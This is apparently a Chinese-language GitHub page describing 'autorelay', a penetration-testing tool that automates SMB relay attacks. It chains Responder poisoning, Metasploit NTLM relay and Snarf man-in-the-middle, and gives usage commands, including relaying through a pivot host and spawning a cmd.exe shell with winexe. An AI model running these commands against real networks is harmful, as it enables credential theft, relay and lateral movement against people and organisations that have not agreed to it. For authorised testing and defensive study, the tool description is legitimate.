DanMcInerney/autorelay
GitHub: DanMcInerney/autorelay
自动化 SMB 中继攻击工具,整合 Responder、Metasploit 和 Snarf 实现从流量毒化到凭据中继的完整攻击链。
Stars: 73 | Forks: 20
# Autorelay
自动在本地或远程设备上执行 SMB 中继攻击。使用 Responder 进行毒化,Metasploit 进行 HTTP NTLM 中继(而不仅仅是 SMB 中继),以及 Snarf 进行 MITM。在本地使用时,只需要一个接口和一个 nmap XML 文件或目标网络上的 IP 列表来确定 SMB 主机。当用于跳板机上的 SMB 中继时,需要跳板机的 IP 地址。
## 用法
#####本地
* sudo ./autorelay.py -x local-network.xml -i eth0
* sudo ./autorelay.py -l ips.txt -i eth0 ** -l 选项需要稍作修复 **
#####远程
* sudo ./autorelay.py -x remote-network.xml -i eth0 -r 95.34.53.243
* sudo ./autorelay.py -l ips.txt -i eth0 -r 95.34.53.243 ** -l 选项需要稍作修复 **
将本地浏览器指向 http://localhost:4001 并定期刷新以查看您的 MITM 连接
连接过期(或您使其过期)后,点击“choose”
如果在本地中继,请在本地运行此命令;如果是远程中继,请在跳板机上运行:smbclient -U a%a //127.0.0.1
或者,如果您通过 SMB 连接获得了管理员权限,可以使用以下命令生成 shell:winexe -U a%a //127.0.0.1 -U cmd.exe
标签:CTF学习, PE 加载器, Python安全工具, Responder, SMB中继攻击, SMB协议, 中间人攻击, 内网渗透, 凭据窃取, 协议分析, 权限提升, 横向移动, 渗透测试框架, 编程规范, 网络安全, 网络攻击工具, 自动化渗透测试, 逆向工具, 防御, 隐私保护